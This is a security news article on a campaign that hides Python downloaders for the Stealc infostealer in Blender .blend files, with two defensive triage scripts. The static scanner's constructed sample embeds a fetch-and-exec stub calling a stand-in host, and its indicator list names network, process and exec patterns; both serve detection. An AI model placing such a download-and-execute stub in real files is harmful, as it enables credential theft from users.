Malicious Blender Models Deliver Stealc Malware to 3D Artists

Malicious Blender models now threaten 3D artists and developers: weaponized .blend project files carry embedded Python that fetches the Stealc infostealer. Attackers use these infected assets to compromise creative pipelines and harvest credentials, browser sessions and wallet data. The campaign shows threat actors moving toward the tools of digital content creation to reach studios and the development infrastructure their staff can log in to.

How the Attack Works

Security researchers uncovered infected .blend files that carry hidden Python scripts. Blender runs these scripts when a user opens the project, but only if the Auto Run Python Scripts preference is enabled; it is off by default in current releases, and when it is off Blender blocks the script and shows a banner asking whether to allow it. The script then downloads Stealc, a known infostealer that collects saved credentials, browser data, cryptocurrency wallet files and session tokens. The attack relies on the trust many designers place in shared assets and community marketplaces, and on users who have switched auto-run on because legitimate rigs and tools depend on it.

Weaponized .blend Files

Attackers embed Python code in the project file as text datablocks flagged to register on load. When the file is opened with auto-run enabled, Blender executes that code with the full privileges of the user running Blender; nothing sandboxes it. The feature exists for legitimate automation such as rig interfaces and custom tools, yet threat actors now use it to run silent download commands. Users who fetch models from unknown sources and open them with auto-run on risk immediate compromise.

Stealc Malware Capabilities

Stealc is a Windows infostealer sold to other criminals as a service. Once running it scans user profile directories, browser storage and application folders, and extracts cryptocurrency wallet files, saved passwords, cookies and autofill data. It sends the harvested data to servers controlled by the attackers. Victims often remain unaware until accounts show suspicious activity, and because stolen cookies and session tokens can be replayed, the attacker may already be logged in as the victim by then.

Distribution Channels

Attackers share malicious Blender models through forums, asset repositories and direct messages. Creative communities rely heavily on shared resources, so a single convincing upload reaches many workstations. Some malicious files mimic professional work to gain trust. Artists on commercial or gaming projects face higher risk because the credentials stolen from them may grant access to development servers, source control or cloud repositories.

Targeting Creative Professionals

Many targeted users work in industries where access to assets and tools is essential: gaming studios, VFX teams and independent artists. Compromised accounts can expose source files, internal tools and unfinished projects. Attackers may sell this material on underground markets or use it for further intrusions.

Technical Details of the Attack

Researchers noted that the payload is staged. The Python code embedded in the .blend file is a small downloader that fetches the next stage from attacker-controlled servers, so the file itself contains nothing that looks like malware. The next stage downloads Stealc, writes it to hidden directories and establishes persistence through scheduled tasks or autorun entries, so the infection survives a reboot.

Evasion Techniques

Attackers designed the malicious Blender models to bypass simple detection. The embedded Python is short and reads like ordinary automation, and some payloads use obfuscation that blends with legitimate tooling. Many antivirus engines still lack signatures for these files, and .blend is not a format that endpoint scanners commonly unpack to inspect embedded scripts. Users may not notice anything unusual because the models open and render normally.
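Because the stub is short and the file format is opaque to most scanners, the practical check is to triage .blend files at rest without opening them in Blender. The script below is an added example of my own, not tooling from the researchers or from the Blender project. It walks the documented .blend file-block layout (12-byte header, then blocks of code, size, old address, SDNA index and count), recovers embedded Text datablocks and flags Python that needs network, process or dynamic-execution capability. Assumptions: that a text's line strings follow its TX block as raw NUL-terminated DATA blocks until the next ID block (the order Blender's writer uses), that the text name can be recovered from the ID name field, and the indicator list, which is mine and not drawn from the campaign. The sample file built inline is constructed for the demonstration and is not a real malicious model.

```python
"""Static triage of a .blend file for embedded Python (added example, no Blender needed).
Walks the file blocks, recovers embedded Text datablocks and flags capabilities a
download-and-execute stub needs. Nothing in the file is ever executed."""
import gzip
import re
import struct

TEXT_ID_CODE = b"TX\x00\x00"   # header code of a Text datablock
DATA_CODE = b"DATA"            # data belonging to the preceding ID block
END_CODE = b"ENDB"

# Assumed indicator list (my own heuristics, not from the campaign report).
INDICATORS = {
    "network": rb"\b(?:urllib|requests|socket|http\.client)\b",
    "process": rb"\b(?:subprocess|os\.system|os\.popen|ctypes)\b",
    "dynamic_exec": rb"\b(?:exec|eval|compile)\s*\(",
    "encoding": rb"\b(?:base64|zlib|marshal)\b",
    "load_hook": rb"\bbpy\.app\.handlers\.load_post\b",
    "url": rb"https?://",
}

def decompress(data: bytes) -> bytes:
    """Blender < 3.0 compressed with gzip; 3.0+ uses zstd, handled out of band."""
    if data[:2] == b"\x1f\x8b":
        return gzip.decompress(data)
    if data[:4] == b"\x28\xb5\x2f\xfd":
        raise ValueError("zstd-compressed .blend, run `zstd -d` on it first")
    return data

def parse_header(data: bytes):
    """12-byte header: 'BLENDER', pointer size ('-'=8, '_'=4), endian ('v'=LE), version."""
    if data[:7] != b"BLENDER":
        raise ValueError("not a .blend file")
    ptr = 8 if data[7:8] == b"-" else 4
    endian = "<" if data[8:9] == b"v" else ">"
    return ptr, endian, data[9:12].decode("ascii")

def iter_blocks(data: bytes, ptr: int, endian: str):
    """Yield (code, body) per file block; header is code, size, old address, SDNA index, count."""
    fmt = endian + "4si" + ("Q" if ptr == 8 else "I") + "ii"
    hlen = struct.calcsize(fmt)
    off = 12
    while off + hlen <= len(data):
        code, size, _addr, _sdna, _count = struct.unpack_from(fmt, data, off)
        yield code, data[off + hlen:off + hlen + size]
        if code == END_CODE:
            break
        off += hlen + size

def _is_text_line(body: bytes) -> bool:
    """Line strings are raw NUL-terminated DATA blocks; TextLine structs hold pointers and fail this."""
    return all(0x20 <= b < 0x7F or b == 0x09 for b in body.rstrip(b"\x00"))

def extract_texts(data: bytes):
    """Return [{'name', 'source'}] per embedded Text (assumes TX block, then its DATA blocks)."""
    data = decompress(data)
    ptr, endian, _version = parse_header(data)
    texts, current = [], None
    for code, body in iter_blocks(data, ptr, endian):
        if code == TEXT_ID_CODE:
            m = re.search(rb"TX([\x20-\x7e]{1,63})\x00", body)  # ID.name keeps the 'TX' prefix
            current = {"name": m.group(1).decode() if m else "<unnamed>", "lines": []}
            texts.append(current)
        elif code == DATA_CODE and current is not None:
            if _is_text_line(body):
                current["lines"].append(body.rstrip(b"\x00").decode("ascii"))
        else:
            current = None  # any other ID block ends this text's data
    return [{"name": t["name"], "source": "\n".join(t["lines"])} for t in texts]

def triage(data: bytes):
    """Score every embedded text; any hit deserves a manual look before the file is opened."""
    out = []
    for t in extract_texts(data):
        src = t["source"].encode()
        hits = sorted(k for k, pat in INDICATORS.items() if re.search(pat, src))
        out.append({"name": t["name"], "lines": src.count(b"\n") + 1 if src else 0, "indicators": hits})
    return out

def build_sample(compressed: bool = False) -> bytes:
    """Constructed minimal 64-bit little-endian .blend with one embedded stub. Not a real
    campaign file; the URL is a non-resolving .invalid name and is never fetched."""
    def block(code, body, sdna=0):
        return struct.pack("<4siQii", code, len(body), 0xDEADBEEF, sdna, 1) + body
    stub = [b"import base64, urllib.request, subprocess", b"",
            b"u = 'http://stage2.example.invalid/p'",
            b"exec(urllib.request.urlopen(u).read())"]
    tx = block(TEXT_ID_CODE, b"\x00" * 32 + b"TXloader.py\x00" + b"\x00" * 54, sdna=42)
    line_struct = block(DATA_CODE, struct.pack("<QQQQi", 0, 0, 0xCAFE, 0, 40) + b"\x00" * 4, sdna=7)
    lines = b"".join(block(DATA_CODE, s + b"\x00") for s in stub)
    raw = b"BLENDER-v305" + tx + line_struct + lines + block(END_CODE, b"")
    return gzip.compress(raw) if compressed else raw

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    for f in triage(blob):
        print(f"{f['name']}: {f['lines']} lines, indicators={f['indicators'] or 'none'}")
```

Run it as `python blend_triage.py model.blend`; with no argument it triages the constructed sample and reports `loader.py` with the network, process, dynamic_exec, encoding and url indicators. The Register flag that decides whether a text auto-runs lives inside the Text struct and needs the file's DNA catalogue to decode, so this triage deliberately treats any embedded text with indicators as suspect whether or not it is flagged. Files saved with Blender's Compress option in 3.0 or later are zstd frames; decompress them with `zstd -d` before scanning.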

Why This Campaign Matters

The attack highlights a shift in the threat landscape: creative tools now present valuable entry points into professional environments. Artistic workflows involve constant exchange of files, which raises the chance that an infected asset gets opened. Malicious Blender models show how threat actors adapt their delivery to new platforms and new communities.

How Users Can Protect Themselves

3D artists can reduce risk by leaving Blender's script auto-execution disabled (Edit > Preferences > Save & Load > Auto Run Python Scripts) and by launching Blender with --disable-autoexec when opening files from outside the studio; when Blender blocks a script on load it shows a warning banner, and that banner appearing on a downloaded model is itself a reason to stop. Users should also check the source of every downloaded asset and scan files with updated security tools. Studios can enforce stricter guidelines for asset imports, for example opening untrusted files only on an isolated machine with no saved credentials. Multi-factor authentication reduces the value of stolen passwords, but Stealc also takes cookies and session tokens, which can be replayed without a second factor, so after a suspected infection revoke active sessions and rotate tokens and API keys, not just passwords.

Safe Asset Handling Practices

  • Download models only from trusted marketplaces.
  • Verify authors before importing project files.
  • Disable script auto-run unless required.
  • Store critical files in controlled directories.
  • Audit new assets before adding them to pipelines.
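For the audit step, the safest way to look inside a suspect file is to let Blender itself load it with auto-execution forced off and then ask what would have run. Blender's auto-run gate covers two things: text datablocks with the Register box ticked, and Python expressions in drivers. The script below is an added example of my own, not tooling from the researchers or the Blender project. It assumes the invocation `blender --background --disable-autoexec suspect.blend --python blend_audit.py` (all standard Blender command-line options), that `Text.use_module` exposes the Register checkbox, and that `Driver.is_simple_expression` tells apart expressions Blender evaluates without invoking Python; `assess()` is a pure function and can be exercised outside Blender.

```python
"""Audit a .blend inside Blender with script auto-execution forced off (added example).
Run as:  blender --background --disable-autoexec suspect.blend --python blend_audit.py
With --disable-autoexec (-Y) Blender ignores the saved Auto Run preference, so
registered texts and Python driver expressions are not evaluated on load; this
script then lists what would have run had auto-run been on."""
try:
    import bpy
except ImportError:  # outside Blender only the pure assess() function is usable
    bpy = None

def collect():
    """Gather auto-run candidates from the file Blender has loaded. Needs bpy."""
    texts = [
        {"name": t.name, "registered": t.use_module, "lines": len(t.lines)}
        for t in bpy.data.texts
    ]
    drivers = []
    # Drivers can hang off many ID types; these collections commonly carry them.
    for coll in ("objects", "materials", "node_groups", "scenes", "shape_keys",
                 "meshes", "cameras", "lights"):
        for idb in getattr(bpy.data, coll, []):
            ad = getattr(idb, "animation_data", None)
            if ad is None:
                continue
            for fc in ad.drivers:
                d = fc.driver
                if d.type == "SCRIPTED":
                    drivers.append({
                        "owner": idb.name,
                        "path": fc.data_path,
                        "expression": d.expression,
                        # simple expressions such as 'frame * 2' never reach the interpreter
                        "simple": bool(getattr(d, "is_simple_expression", False)),
                    })
    # Set by Blender when the file asked for auto-execution and it was refused.
    blocked = bool(getattr(bpy.app, "autoexec_fail", False))
    return texts, drivers, blocked

def assess(texts, drivers, blocked):
    """Pure decision: does this file need a human look before anyone opens it normally?"""
    reasons = []
    for t in texts:
        if t["registered"]:
            reasons.append(f"text '{t['name']}' is set to Register ({t['lines']} lines)")
    for d in drivers:
        if not d["simple"]:
            reasons.append(f"driver on {d['owner']}:{d['path']} runs Python: {d['expression']!r}")
    if blocked:
        reasons.append("Blender reported that auto-execution was requested and blocked")
    return {"verdict": "REVIEW" if reasons else "CLEAN", "reasons": reasons}

if __name__ == "__main__" and bpy is not None:
    result = assess(*collect())
    print(result["verdict"])
    for reason in result["reasons"]:
        print(" -", reason)
```

A REVIEW verdict on a model that has no reason to carry scripts (a static prop, a texture pack) is the signal to discard it; rigs with legitimate UI scripts will also trip it, which is why the report names the text and line count so the reviewer can read the source in Blender's Text Editor before enabling anything. Keep the audit machine offline and free of saved browser sessions, since the point of the exercise is to never run the embedded code at all.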

Final Thoughts

Malicious Blender models reveal a growing threat to artistic and development communities. Attackers use these infected project files to deploy Stealc malware and steal valuable credentials. Strong asset hygiene, careful source verification, and better scripting controls can reduce risk. Creative teams that depend on shared resources must stay alert as attackers continue to exploit overlooked tools.

Janet Andersen

Janet is an experienced content creator with a strong focus on cybersecurity and online privacy. With extensive experience in the field, she’s passionate about crafting in-depth reviews and guides that help readers make informed decisions about digital security tools. When she’s not managing the site, she loves staying on top of the latest trends in the digital world.